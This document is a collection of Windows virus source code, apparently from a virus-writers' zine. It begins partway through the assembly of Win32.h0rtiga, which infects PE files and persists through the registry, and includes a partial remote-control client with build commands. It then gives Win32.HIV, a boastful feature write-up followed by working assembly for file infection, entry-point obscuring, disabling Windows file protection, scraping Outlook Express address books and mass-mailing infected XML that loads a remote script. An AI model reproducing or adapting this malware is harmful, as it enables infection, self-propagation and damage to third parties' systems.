@_1: cmp byte ptr [esi], 0
jz @_2
inc esi
jmp @_1
@_2: inc esi
sub esi, edx
mov ecx, esi
xor eax, eax
mov word ptr [ebp + Counter], ax
mov esi, [ebp + kernel]
add esi, 3Ch
lodsw
add eax, [ebp + kernel]
mov esi, [eax + 78h]
add esi, [ebp + kernel]
add esi, 1Ch
lodsd
add eax, [ebp + kernel]
mov dword ptr [ebp + AddressTableVA], eax
lodsd
add eax, [ebp + kernel]
push eax
lodsd
add eax, [ebp + kernel]
mov dword ptr [ebp + OrdinalTableVA], eax
pop esi
@_3: push esi
lodsd
add eax, [ebp + kernel]
mov esi,eax
mov edi,edx
push ecx
cld
rep cmpsb
pop ecx
jz @_4
pop esi
add esi,4
inc word ptr [ebp + Counter]
jmp @_3
@_4: pop esi
movzx eax, word ptr [ebp + Counter]
shl eax,1
add eax,dword ptr [ebp + OrdinalTableVA]
xor esi,esi
xchg eax,esi
lodsw
shl eax,2
add eax,dword ptr [ebp + AddressTableVA]
mov esi,eax
lodsd
add eax, [ebp + kernel]
ret
MakeTabla: push esi
call dword ptr [ebp + ddLoadLibraryA]
push ebx
pop ecx
push eax
pop ebx
buki: lodsb
test al, al
jnz buki
MT1: push ecx
push esi
push ebx
call dword ptr [ebp + ddGetProcAddress]
push eax
MT2: lodsb
test al, al
jnz MT2
pop eax
stosd
pop ecx
loop MT1
ret
BuscaHostToInfect:
lea edi, ebp + Counter
xor ax, ax
stosw
lea esi, ebp + WinFindData
push esi
lea esi, ebp + _maskExe
push esi
call dword ptr [ebp + ddFindFirstFileA]
ret
ContinuaBusqueda:
cmp [ebp + Counter], MaxInfeccion
jz CB_end
lea esi, ebp + WinFindData
push esi
push ebx
call dword ptr [ebp + ddFindNextFileA]
ret
CB_end: xor eax, eax
ret
TerminaBusqueda:
push ebx
call dword ptr [ebp + ddFindClose]
ret
Open&Maped_File_RW:
push 0
push 0
push 3h
push 0
push 0
push 80000000h or 40000000h
push esi
call dword ptr [ebp + ddCreateFileA]
cmp eax, -1
jz OMF_error
lea edi, ebp + hFicActual
stosd
push 0
push ebx
push 0
push 4h
push 0
push eax
call dword ptr [ebp + ddCreateFileMappingA]
test eax, eax
jz OMF_error
lea edi, ebp + hCMapActual
stosd
push ebx
push 0
push 0
push 2h
push eax
call dword ptr [ebp + ddMapViewOfFile]
test eax, eax
jz OMF_error
ret
OMF_error: push -1
pop eax
ret
Close&UnMaped_File_RW:
push eax
call dword ptr [ebp + ddUnmapViewOfFile]
test eax, eax
jz CUF_error
lea esi, ebp + WinFindData.WFD_ftLastWriteTime
push esi
lea esi, ebp + WinFindData.WFD_ftLastAccessTime
push esi
lea esi, ebp + WinFindData.WFD_ftCreationTime
push esi
lea esi, ebp + hFicActual
lodsd
push eax
call dword ptr [ebp + ddSetFileTime]
lea esi, ebp + hCMapActual
lodsd
push eax
call dword ptr [ebp + ddCloseHandle]
lea esi, ebp + hFicActual
lodsd
push eax
call dword ptr [ebp + ddCloseHandle]
test eax, eax
jz CUF_error
xor eax, eax
ret
CUF_error: push -1
pop eax
ret
EliminaAtributosFichero:
push 80h
lea esi, ebp + WinFindData.WFD_szFileName
push esi
call dword ptr [ebp + ddSetFileAttributesA]
ret
RestauraAtributosFichero:
lea esi, ebp + WinFindData.WFD_dwFileAttributes
lodsd
push eax
lea esi, ebp + WinFindData.WFD_szFileName
push esi
call dword ptr [ebp + ddSetFileAttributesA]
ret
EsInfectable:
push 0
push 0
push 3h
push 0
push 0
push 80000000h
push esi
call dword ptr [ebp + ddCreateFileA]
cmp eax, -1
jz OMFR_error
lea edi, ebp + hFicActual
stosd
push 0
push 0
push 0
push 2h
push 0
push eax
call dword ptr [ebp + ddCreateFileMappingA]
test eax, eax
jz OMFR_error
lea edi, ebp + hCMapActual
stosd
push 0
push 0
push 0
push 4h
push eax
call dword ptr [ebp + ddMapViewOfFile]
test eax, eax
jz OMFR_error
push eax
push eax
pop edx
add eax, [edx + 3ch]
cmp word ptr [edx], 'ZM'
jnz NoInfect
cmp word ptr [eax], 'EP'
jnz NoInfect
cmp word ptr [eax + 4ch], 0d00dh
jnz SiInfect
NoInfect: push -1
pop ebx
jmp SNInfect
SiInfect: call CalculaSizeToMap
SNInfect: call dword ptr [ebp + ddUnmapViewOfFile]
test eax, eax
jz OMFR_error
lea esi, ebp + hCMapActual
lodsd
push eax
call dword ptr [ebp + ddCloseHandle]
test eax, eax
jz OMFR_error
lea esi, ebp + hFicActual
lodsd
push eax
call dword ptr [ebp + ddCloseHandle]
test eax, eax
jz OMFR_error
xchg ebx, eax
ret
OMFR_error: push -1
pop eax
ret
CalculaSizeToMap:
push eax
pop ebx
xchg ebx, edx
xor eax, eax
mov ax, word ptr [edx + 6h]
mov word ptr [ebp + NumObjects], ax
xor eax, eax
add ax, word ptr [edx + 14h]
add eax, 18h
add eax, edx
mov dword ptr [ebp + ObjectTableOffset], eax
push eax
pop esi
xor eax, eax
mov ax, word ptr [ebp + NumObjects]
push SIZEOF_NEWOBJECT
pop ecx
xor edx, edx
mul ecx
add esi, eax
xor edx, edx
add edx, [ebx + 3ch]
add edx, ebx
lea edi, ebp + FileAlign
mov eax, dword ptr [edx + 3ch]
stosd
mov ecx, dword ptr [ebp + FileAlign]
push virlenght
pop eax
xor edx, edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + physicalsize], eax
mov eax, [esi - SIZEOF_NEWOBJECT + 20]
add eax, [esi - SIZEOF_NEWOBJECT + 16]
mov ecx, dword ptr [ebp + FileAlign]
xor edx, edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + physicaloffset], eax
xchg ebx, eax
lea esi, ebp + physicalsize
lodsd
add ebx, eax
mov dword ptr [ebp + SizeToMap], ebx
ret
InsertaRegistro:
lea esi, ebp + sz_mAdv32
lea edi, ebp + addr_apis3
mov ebx, NumAPISAdv32
call MakeTabla
lea esi, ebp + disposition
push esi
add esi, 4
push esi
push 0
push 0f003fh
push 0
add esi, 4
push esi
push 0
add esi, claselen
push esi
push 80000002h
call dword ptr [ebp + ddRegCreateKeyExA]
test eax, eax
jnz reg_error
lea esi, ebp + KeyHandle
lodsd
xchg eax, ebx
push dword ptr [ebp + KeyValuelen]
lea esi, ebp + sz_exec
push esi
push 1h
push 0
lea esi, ebp + KeyName
push esi
push ebx
call dword ptr [ebp + ddRegSetValueExA]
test eax, eax
jnz reg_error
push ebx
call dword ptr [ebp + ddRegCloseKey]
reg_error: ret
InsertaServidor:
call dword ptr [ebp + ddGetCommandLineA]
push eax
pop esi
lea edi, ebp + sz_exec
ot_bmas: lodsb
stosb
test al, al
jnz ot_bmas
push 0
push 00000080h
push 3
push 0
push 00000001h
push 80000000h
lea esi, ebp + sz_exec
push esi
call dword ptr [ebp + ddCreateFileA]
cmp eax, -1
jz errorEx
mov dword ptr [ebp + hRead], eax
push 260
lea ebx, ebp + sz_exec
push ebx
call dword ptr [ebp + ddGetSystemDirectoryA]
test eax, eax
jz errorEx
add eax, ebx
xchg eax, edi
lea esi, ebp + sz_nserver
ot_bmas2: lodsb
stosb
test al, al
jnz ot_bmas2
mov dword ptr [ebp + KeyValuelen], 0
lea esi, ebp + sz_exec
calclenstr: lodsb
inc dword ptr [ebp + KeyValuelen]
test al, al
jnz calclenstr
call InsertaRegistro
push 0
push 00000080h
push 1
push 0
push 0h
push 40000000h
lea esi, ebp + sz_exec
push esi
call dword ptr [ebp + ddCreateFileA]
cmp eax, -1
jz errorEx
mov dword ptr [ebp + hWrite], eax
read_again: xor eax, eax
push eax
lea edi, ebp + bytes_rw
push edi
stosd
push 260
lea esi, ebp + sz_exec
push esi
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddReadFile]
test eax, eax
jz errorEx
lea esi, ebp + bytes_rw
lodsd
test eax, eax
jz fdf
xchg eax, ebx
xor eax, eax
push eax
lea edi, ebp + bytes_rw
push edi
stosd
push ebx
lea esi, ebp + sz_exec
push esi
lea esi, ebp + hWrite
lodsd
push eax
call dword ptr [ebp + ddWriteFile]
test eax, eax
jnz read_again
jz errorEx
fdf: push 0
push 0
push 3ch
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddSetFilePointer]
xor eax, eax
push eax
lea edi, ebp + bytes_rw
push edi
stosd
push 4
lea esi, ebp + sz_exec
push esi
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddReadFile]
push 0
push 0
lea esi, ebp + sz_exec
lodsd
add eax, 40
push eax
push eax
pop ebx
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddSetFilePointer]
xor eax, eax
push eax
lea edi, ebp + bytes_rw
push edi
stosd
push 4
lea esi, ebp + sz_exec
push esi
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddReadFile]
lea esi, ebp + sz_exec
lodsd
add eax, offsServer
push 0
push 0
push ebx
push eax
pop ebx
lea esi, ebp + hWrite
lodsd
push eax
call dword ptr [ebp + ddSetFilePointer]
push ebx
pop eax
lea edi, ebp + sz_exec
stosd
xor eax, eax
push eax
lea edi, ebp + bytes_rw
push edi
stosd
push 4
lea esi, ebp + sz_exec
push esi
lea esi, ebp + hWrite
lodsd
push eax
call dword ptr [ebp + ddWriteFile]
push 0
push 0
push 3ch
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddSetFilePointer]
xor eax, eax
push eax
lea edi, ebp + bytes_rw
push edi
stosd
push 4
lea esi, ebp + sz_exec
push esi
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddReadFile]
push 0
push 0
lea esi, ebp + sz_exec
lodsd
add eax, 92
push eax
push eax
pop ebx
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddSetFilePointer]
push 0
push 0
push ebx
push eax
pop ebx
lea esi, ebp + hWrite
lodsd
push eax
call dword ptr [ebp + ddSetFilePointer]
push 2
pop eax
lea edi, ebp + sz_exec
stosd
xor eax, eax
push eax
lea edi, ebp + bytes_rw
push edi
stosd
push 2
lea esi, ebp + sz_exec
push esi
lea esi, ebp + hWrite
lodsd
push eax
call dword ptr [ebp + ddWriteFile]
lea esi, ebp + hRead
push esi
call dword ptr [ebp + ddCloseHandle]
test eax, eax
jz errorEx
lea esi, ebp + hWrite
push esi
call dword ptr [ebp + ddCloseHandle]
errorEx: ret
error: push 0
call dword ptr [ebp + ddExitProcess]
zero_generation:
call GetModuleHandleA
xchg eax, ebx
sub eax, ebx
lea edi, OldEntryPointRVA
stosd
jmp start
f_generation:
push 0
push offset m_szTitle
push offset m_szCopyright
push 0
call MessageBoxA
push 0
call ExitProcess
end zero_generation
;----------------------------------------------------------------------------
; Win32.h0rtiga - end virus code (w32h0rtiga.asm)
;----------------------------------------------------------------------------
;----------------------------------------------------------------------------
; Win32.h0rtiga - begin client code (h0rtclient.cpp/Visual C++ 6.0)
;----------------------------------------------------------------------------
#include <iostream.h>
#include <string.h>
#include <stdlib.h>
#include <winsock2.h>
typedef struct {
db accion;
dw puertoremoto;
dd direccion;
} Conf_Remota;
dd addrtmp;
void MostrarCreditos () {
cout << "\n\n\t\t (c) 2000 DeepZone - h0rtiga client (Win32) ...\n\n"
<< "\t\t\tCoded by |Zan - izan@galaxycorp.com\n\n\n"
<< "Uso : h0rtclient <h0rtiga host> <port> <new host> <port>\n"
<< "e.j.: h0rtclient host.com 5556 www.pandasoftware.es 80\n\n";
cout.flush();
cremota->accion = acc;
cremota->direccion = dire;
cremota->puertoremoto = premote;
int s, i;
char banner[MAX_BANNER];
sockaddr_in a;
hostent FAR *h = NULL;
WSADATA wsaData;
Conf_Remota conf_remota;
// Show credits
MostrarCreditos();
// Num params ?
if (argc != 5) {
// WinSock up!!
// server's name
if (isalpha((int)*(argv[1]))) {
h = gethostbyname(argv[1]);
if (h == NULL) {
cout << "Error : No se puede hallar el nombre del anfitrion\n\n";
WSACleanup();
exit(-1);
else {
if ((a.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE) {
}
}
// port ?
a.sin_family = AF_INET;
a.sin_port = htons((dw)atoi(argv[2]));
if (s==0) {
// trying ...
// clean banner
else {
if (isalpha((int)*(argv[3]))) {
h = gethostbyname(argv[3]);
if (h == NULL) {
cout << "Error : No se puede hallar nombre de anfitrion remoto\n\n";
WSACleanup();
exit(-1);
else {
if ((addrtmp = inet_addr (argv[3])) == INADDR_NONE) {
}
}
closesocket(s);
// WinSock down !!
WSACleanup();
}
;----------------------------------------------------------------------------
; Win32.h0rtiga - end client code (h0rtclient.cpp)
;----------------------------------------------------------------------------
;----------------------------------------------------------------------------
; Win32.h0rtiga - compiling ... (Tasm 5.0/x86)
;----------------------------------------------------------------------------
;
; tasm32 -ml w32h0rtiga.asm
; tlink32 -Tpe -c -x w32h0rtiga.obj ,,, import32
; pewrsec.com w32h0rtiga.exe
;
;
; --] EOF
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[HIV.ASM]ÄÄÄ
COMMENT#
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Win32.HIV ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ by Benny/29A ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Finally I finished this virus... it took me more than 8 months to code it.
I hope you will like it and enjoy the new features it presents.
Here comes a deep description of Win32.HIV...
Direct action:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The virus infects ALL PE filez (also inside MSI filez) in current directory.
Infection of PE filez is done by appending to the last section. Infection of
PE filez inside MSIs is done by cavity algorithm:
Into these PE filez not whole virus will be copied, but only a small chunk of
code, which will after execution display message and jump back to host. This
can be called as a payload.
EntryPoint Obscuring:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Yeah, this virus also uses EPO, which means: virus doesn't modify entrypoint,
it is executed "in-the-middle" of execution of host program. Again, this is
trick to fuck heuristic analysis :)
It overwrites procedure's epilog by <jmp virus> instruction. The epilog loox
like:
Even if the sequence couldn't be found it infects the file - this will take
AVerz some time to understand :)
Multi-process residency:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
This virus is multi-process resident, which means it can become resident in
ALL process in the system, not only in the current one. Virus does:
Very efficent! Imagine - you have executed WinCommander and accidently you
will execute virus. The virus become resident in ALL process, including
WinCommander, so every file manipulation will be caught by virus. If you will
open any file under WinCommander, virus will infect it! :)
The infection runs in separated thread and execution is passed to host code,
so you should not recognize any system slow down. Also, the ExitProcess API is
hooked, so the process can be terminated only when the infection is finished.
SFC stuff:
ÄÄÄÄÄÄÄÄÄÄÄ
All Win2k compatbile infectorz used SfcIsFileProtected API to check if victim
files r protected by system and if so, they didn't infect them. This infector
can disable SFC under Win98/2k/ME, so ALL filez (even the system ones) can be
infected! I would like to thank Darkman for his ideaz and SFC code.
Mail spreading:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The virus finds in registry the location of default address book file of Outlook
Express, gets 5 mail addresses from there and sends there infected XML document
(see bellow).
<?xml version="1.0"?>
<?xml:stylesheet type="text/xsl" href="http://coderz.net/benny/viruses/press.txt"?>
<i>This cell has been infected by HIV virus, generation: XXXXXXXXXX</i>
press.txt is XSL - XML stylesheet, which is loaded together with XML file and
can be placed anywhere on the internet. This XSL contains VBScript which will
infect computer. XML loox like clean - in fact, it is, but it uses template,
which is infected. I l0ve this stuff...:-)
NTFS stuff:
ÄÄÄÄÄÄÄÄÄÄÄÄ
The virus compresses infected filez placed on NTFS, so the infected filez
are usually smaller than the clean copies...user should not recognize any
space eating...;) Also, it contains next payload - using file streamz on NTFS.
Every infected file on NTFS will have new stream ":HIV" containing message:
"This cell has been infected by HIV virus, generation: " + 10-char number of
virus generation in decimal format.
Anti-*:
ÄÄÄÄÄÄÄÄ
Yeah, the virus uses some anti-* featurez, against debuggerz (check "debug_stuff"
procedure), heuristics (SALC opcode, non-suspicious code, EPO) and AVerz
(infected PE files grows by 16384 bytes, about 6,5 kb of virus code, the rest
is data from the end of host - if you will open the file and go to EOF, you
will not find any virus :)
Other features:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The virus doesn't check extensions of victim files, it just opens the file and
chex the internal format, if the file is suitable for infection.
Also, the bug can correct the checksum of infected file (if it is needed), so
there should not be any problem with infection of some files under WinNT/2k.
Known bugz:
ÄÄÄÄÄÄÄÄÄÄÄÄ
Here I would like to thank Perikles and Paddingx for beta-testing Win32.HIV.
I tried to fix all possible bugz, but no program is bug-free, right? :P
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Some comments ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
That was the small description of the virus. I was coding it verz long time,
since the winter 2000, right after Win2k.Installer was released. My idea was to
code virus which could defeat OS "immunity". Heh, and becoz the HIV virus does
the same with human body, I decided to name my virus so.
This virus passed with me all my personal problems and happiness. This year
my life was like on the rolercoaster. Once up, once down. Everything important
that happened to me... there was this virus with me... I'm glad that I finished
it, but I also feel great nostalgy.
Well, I would like to greet some of my friends that helped me or just were
with me and created good atmosphere of all the year.
Darkman: That's a pity that we couldn't code next common virus. However,
thnx for yer help, yer moral support and everything... come
back to vx!
GriYo & Maia: It was really wonderful time in Brno. I'm glad that you came.
Just say weeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeed :)
Rajaat: Many many many thnx for the atmosphere you created on our
meeting... I really enjoyed it. Shroomz 4ever! :) btw, I want
those CDs of Timothy Leary and Kate Bush :-)
Ratter: Don't think you are, know you are!
Skag: Psychedelic drugz rulez :P
Perikles: Thanx for beta-testing dude!
Paddingx: ----------- " " ------------
GigaByte: Very nice time in Brno... but'ta... next time: speak slowly :)
Lada: Rather yes than ratter no :-) Thnx for the best holidayz I've
ever had.
Petra: H3y4, y4 g0t v3ry nIc3 b0dy :)
Queenie: /me hugs ya :D
Timothy Leary: Hey man, ya rule, yer death is the biggest lost for the world
in this age...
;now we will hook ExitProcess API of host program so host program could
;be terminated only when virus thread will finish its action
lea eax,[ebp + newExitProcess - gdelta] ;address of new handler
sub eax,[ebp + image_base - gdelta] ;correct it to RVA
push eax ;save it
push 040F57181h ;CRC32 of ExitProcess
mov eax,400000h ;image base of host file
image_base = dword ptr $-4
call patch_IT ;hook API
test eax,eax
je end_host ;quit if error
mov [ebp + oldExitProcess - gdelta],eax ;save old address
;now we will create thread which will try to infect all K32s in all
;processes - multi-process residency
call _tmp
tmp dd ? ;temporary variable
_tmp: xor eax,eax
push eax
push ebp
lea edx,[ebp + searchThread - gdelta]
push edx
push eax
push eax
call [ebp + a_CreateThread - gdelta] ;create new thread
xchg eax,ecx
jecxz end_host ;quit if error
push eax
call [ebp + a_CloseHandle - gdelta] ;close its handle
end_host:
@SEH_RemoveFrame ;remove SEH frame
mov edi,[esp.cPushad] ;get EPO address (*)
mov eax,0C95B5E5Fh ;restore host code
stosd ;...
mov al,0C3h ;...
stosb ;...
popad ;restore all registers
ret ;and jump back to host
push edi
add edi,eax
call @sfcme
db '\SYSTEM\sfp\sfpdb.sfp',0 ;store the path
@sfcme: pop esi
push 22
pop ecx
rep movsb
pop ebx
call Create_FileA ;open the file
inc eax
je end_seh
dec eax
xchg eax,esi
push 0
push esi
call [ebp + a_GetFileSize - gdelta] ;get file size to EDI
xchg eax,edi
mov [ebp + sfcme_size - gdelta],edi ;save it
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push edi
push 0
call [ebp + a_VirtualAlloc - gdelta] ;allocate buffer for file
test eax,eax
je sfcme_file
xchg eax,ebx ;address to EBX
push 0
lea eax,[ebp + tmp - gdelta]
push eax
push edi
push ebx
push esi
call [ebp + a_ReadFile - gdelta] ;read file content to our buffer
find_comma:
lodsb ;load byte
stosb ;store it
dec ecx ;decrement counter
cmp al,','
jne find_comma ;find comma
find_cr:dec esi
lodsw
dec ecx
cmp ax,0A0Dh
jne find_cr ;find CRLF sequence
mov eax,0A0D2C2Ch
stosd ;save commas and CRLF
inc ecx
loop find_comma ;do it in a loop
pop eax ;get base address of buffer
sub edi,eax ;EDI - size of data
mov [esp.Pushad_eax],edi ;save it
popad ;restore all registerz
push eax ;store size to stack
xor eax,eax
push eax
push eax
push eax
push esi ;move to beginning of file
call [ebp + a_SetFilePointer - gdelta]
pop ecx
push 0
lea eax,[ebp + tmp - gdelta]
push eax
push ecx
push ebx
push esi
call [ebp + a_WriteFile - gdelta] ;write modified data (unprotect
push esi ;filez under WinME :-)
call [ebp + a_SetEndOfFile - gdelta] ;set EOF
push MEM_DECOMMIT
push 12345678h
sfcme_size = dword ptr $-4
push ebx
call [ebp + a_VirtualFree - gdelta]
push MEM_RELEASE
push 0
push ebx
call [ebp + a_VirtualFree - gdelta] ;release buffer memory
jmp sfcme_file ;close file and quit
sfc_stuffME EndP
push esi
call [ebp + a_SetEndOfFile - gdelta] ;truncate file
sfcme_file:
push esi
call [ebp + a_CloseHandle - gdelta] ;close file
jmp end_seh ;and quit
sfc_stuff98 EndP
mov ebx,[ecx.MZ_lfanew]
add ebx,ecx ;move to PE header
movzx edx,word ptr [ebx.NT_FileHeader.FH_SizeOfOptionalHeader]
lea edx,[edx+ebx+(3*IMAGE_SIZEOF_FILE_HEADER+4)]
;get to second section header
cmp [edx],'tad.' ;must be ".data"
jne end_sfile
cmp byte ptr [edx+4],'a'
jne end_sfile
sfc_parse:
and dword ptr [esi],0 ;nulify everything in that
lodsd ;section
sub ecx,3 ;correct counter
loop sfc_parse ;do it ECX-timez
end_sfile:
push 12345678h
lpsFile = dword ptr $-4
call [ebp + a_UnmapViewOfFile - gdelta];unmap view of file from
end_smfile: ;our address space
push 12345678h
hsMapFile = dword ptr $-4
call [ebp + a_CloseHandle - gdelta] ;close handle of mapping object
end_scfile:
lea eax,[ebp + WFD.WFD_ftLastWriteTime - gdelta]
push eax
lea eax,[ebp + WFD.WFD_ftLastAccessTime - gdelta]
push eax
lea eax,[ebp + WFD.WFD_ftCreationTime - gdelta]
push eax
push dword ptr [ebp + hsFile - gdelta]
call [ebp + a_SetFileTime - gdelta] ;set back file time
push 12345678h
hsFile = dword ptr $-4
call [ebp + a_CloseHandle - gdelta] ;close file
end_sfc:push 12345678h
find_handle = dword ptr $-4
call [ebp + a_FindClose - gdelta] ;close search handle
jmp end_seh ;and quit from procedure
sfc_stuff2k EndP
html_stuff Proc
@pushsz 'ADVAPI32'
call [ebp + a_LoadLibraryA - gdelta] ;load ADVAPI32.DLL library
test eax,eax
jne n_load_xml
ret ;quit if error
n_load_xml:
xchg eax,ebx ;EBX = base of ADVAPI32.DLL
@getsz 'RegCreateKeyA',edx
call @get_api ;get address of RegCreateKeyA API
xchg eax,ecx
jecxz end_xml_lib
mov esi,ecx ;ESI = RegCreateKeyA
@getsz 'RegSetValueExA',edx
call @get_api ;get address of RegSetValueA API
xchg eax,ecx
jecxz end_xml_lib
mov edi,ecx ;EDI = RegSetValueExA
@getsz 'RegCloseKey',edx
call @get_api ;get address of RegCloseKey API
xchg eax,ecx
jecxz end_xml_lib
mov [ebp + a_RegCloseKey - gdelta],ecx;save it
;this procedure can copy icon from .html to .xml filez and get path+filename of
;default WAB file
chg_xml_icon:
lea ecx,[ebp + reg_key - gdelta]
push ecx
@pushsz 'htmlfile'
push 80000000h
call esi ;open "HKEY_CLASSES_ROOT\htmlfile"
test eax,eax
pop eax
jne end_xml_reg2 ;quit if error
push eax
@getsz 'RegQueryValueA',edx
call @get_api ;get address of RegQueryValueA API
xchg eax,ecx ;ECX = RegQueryValueA
jecxz end_xml_lib
push esi
push ecx
push 2
push 0
push 0
push dword ptr [ebp + tmp - gdelta]
call edi ;write icon from \htmlfile to \xmlfile
test eax,eax ;error?
pop eax ;get return address
jne end_xml_reg ;quit
jmp eax ;continue
push 0
push ebp
push 1
push 0
@pushsz 'NeverShowExt'
push dword ptr [ebp + tmp - gdelta]
call edi ;create new item - NeverShowExt - this will
test eax,eax ;hide .XML extension under Windows.
pop eax
jne end_xml_lib
jmp eax
push esi
@endsz
dec esi
mov eax,'lmx.'
mov edi,esi
stosd ;create .XML extension
xor al,al
stosb
pop ebx
g_xml: call Create_FileA ;create .HTML.XML file
xchg eax,edi
inc edi
je end_infect_html
dec edi
push 0
call @wftmp
dd ?
@wftmp: push end_xml-start_xml
call end_xml
start_xml: ;start of "infected" XML document
db '<?xml version="1.0"?>'
db '<?xml:stylesheet type="text/xsl" href="http://coderz.net/benny/viruses/press.txt"?>'
db '<i>'
end_xml:push edi
call [ebp + a_WriteFile - gdelta] ;write first part of XML document
push 0
lea ebx,[ebp + @wftmp-4 - gdelta]
push ebx
push szMsg-1-p_msg
lea eax,[ebp + p_msg - gdelta]
push eax
push edi
call [ebp + a_WriteFile - gdelta] ;write message to XML document
push 0
push ebx
push 4
call @endxml
db '</i>'
@endxml:push edi
call [ebp + a_WriteFile - gdelta] ;and final tag
push edi
call [ebp + a_CloseHandle - gdelta] ;close file
end_infect_html:
popad ;restore all registers
ret ;and quit - HTML is now infected :)
html_stuff EndP
;this procedure can send "infected" XML document to 5 mail addresses via MAPI32
mapi_stuff Proc
pushad
call @i_html ;generate XML file
@getsz 'MAPILogon',edx
call @get_api ;get address of MAPILogon API
test eax,eax
je end_mapi
xchg eax,esi ;ESI - address of MAPILogon
@getsz 'MAPILogoff',edx
call @get_api ;get address of MAPILogoff API
test eax,eax
je end_mapi
xchg eax,edi ;EDI - address of MAPILogoff
@getsz 'MAPISendMail',edx
call @get_api ;get address of MAPISendMail API
test eax,eax
je end_mapi
mov [ebp + a_MAPISendMail - gdelta],eax
;save it
xor edx,edx
lea eax,[ebp + tmp - gdelta];mapi session ptr
push eax
push edx
push edx
lea eax,[ebp + nextPID-1 - gdelta]
push eax
push eax
push edx
call esi ;log on to MAPI32
test eax,eax
jne end_mapi
push 5
pop eax ;number of recipients
stosd
lea eax,[ebp + MsgTo - gdelta]
stosd ;recipients
xor eax,eax
inc eax
stosd
lea eax,[ebp + MAPIFileDesc - gdelta]
stosd
add edi,4*2
lea eax,[ebp + nextPID-1 - gdelta]
stosd
@getsz 'press@microsoft.com',eax
stosd ;sender
add edi,4*2
push 5
pop ecx
xor eax,eax
msgTo: stosd ;0
inc eax
stosd ;1
dec eax
stosd ;0
imul eax,ecx,22h
lea eax,[eax + ebp + mails - gdelta-22h]
stosd ;get next email address from WAB - recipient
xor eax,eax
stosd ;0
stosd ;0
loop msgTo ;5 timez
add edi,4*3
xor eax,eax
push eax
push eax
lea ecx,[ebp + MAPIMessage - gdelta]
push ecx ;message
push eax
push dword ptr [ebp + tmp - gdelta]
mov eax,12345678h
a_MAPISendMail = dword ptr $-4
call eax ;send E-MAIL !
pop edi
xor eax,eax
push eax
push eax
push eax
push dword ptr [ebp + tmp - gdelta]
call edi ;close MAPI session
end_mapi:
push ebx
call [ebp + a_FreeLibrary - gdelta] ;unload MAPI32.DLL
popad ;restore all registers
ret ;and quit from procedure
mapi_stuff EndP
;this procedure can get 5 e-mail addresses from Outlook Express'es default
;address-book - .WAB file
wab_parse Proc
pushad ;store all registers
@SEH_SetupFrame <jmp end_seh>
;setup SEH frame
lea ebx,[ebp + wab_buffer - gdelta]
call Create_FileA ;open WAB file
inc eax
je end_seh ;quit if error
dec eax
mov [ebp + wFile - gdelta],eax
;store handle
call Create_FileMappingA
xchg eax,ecx ;create file mapping object
jecxz end_wfile
mov [ebp + wMapFile - gdelta],ecx
;store handle
call Map_ViewOfFile ;map view of file to our address space
xchg eax,ecx
jecxz end_wmfile
mov [ebp + wlpFile - gdelta],ecx
jmp next_wab ;save handle
end_wab:push 12345678h
wlpFile = dword ptr $-4 ;unmap view of file
call [ebp + a_UnmapViewOfFile - gdelta]
end_wmfile:
push 12345678h
wMapFile = dword ptr $-4 ;close file mapping object
call [ebp + a_CloseHandle - gdelta]
end_wfile:
push 12345678h
wFile = dword ptr $-4 ;close file
call [ebp + a_CloseHandle - gdelta]
jmp end_seh ;quit from procedure
next_wab:
mov esi,[ecx+60h] ;get to e-mail addresses array
add esi,ecx ;make RAW pointer
lea edi,[ebp + mails - gdelta] ;buffer for 5 mail addresses
xor ebx,ebx ;EBX - 0
push 5
pop ecx ;ECX - 5
m_loop: call parse_wab ;get one e-mail address
add esi,44h ;get to next record
loop m_loop ;ECX timez
jmp end_wab ;and quit
parse_wab:
push ecx ;store registers
push esi ;...
push 22h
pop ecx ;up to 22 characters
r_mail: lodsw ;get unicode character
stosb ;save ANSI character
dec ecx ;decrement counter
test al,al ;end of string?
jne r_mail ;no, continue
add edi,ecx ;yep, correct EDI
pop esi ;restore registers
pop ecx ;...
ret ;and quit
wab_parse EndP
;this procedure can check if the virus is debugged and if so, it can restart
;computer (Win98) or terminate current process (Win2k)
debug_stuff Proc
pushad
;Now we have to get the size of K32 in another process. We use the trick
;-> we will search thru the address space for the end of K32 in memory
;and then we will substract the value with the base address, so we will
;get the size
start_parse:
push mbi_size
lea eax,[ebp + mbi - gdelta] ;MBI structure
push eax
push esi
push ebx ;get informations about
call [ebp + a_VirtualQueryEx - gdelta]
test eax,eax ;adress space
je end_K32_patching ;quit if error
;is memory commited?
test dword ptr [ebp + reg_state - gdelta],MEM_COMMIT
je end_parse ;quit if not, end of K32 found
mov eax,[ebp + reg_size - gdelta] ;get size of region
add [ebp + k32_size - gdelta],eax ;add the size to variable
add esi,eax ;make new address
